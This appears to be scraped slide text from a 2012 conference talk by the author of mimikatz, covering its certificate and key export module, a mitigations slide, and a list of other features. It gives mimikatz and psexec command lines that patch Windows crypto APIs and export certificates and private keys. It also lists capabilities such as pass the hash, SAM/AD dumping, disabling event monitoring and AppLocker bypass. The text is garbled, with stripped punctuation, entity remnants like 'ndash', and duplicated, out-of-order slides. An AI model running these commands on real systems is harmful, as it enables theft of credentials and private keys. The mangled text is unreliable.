Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatz: that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity • Partners and Sponsors for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges • nagual, newsoft, mubix, …
– You for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com/mimikatz – source: https://code.google.com/p/mimikatz – email: benjamin@gentilkiwi.com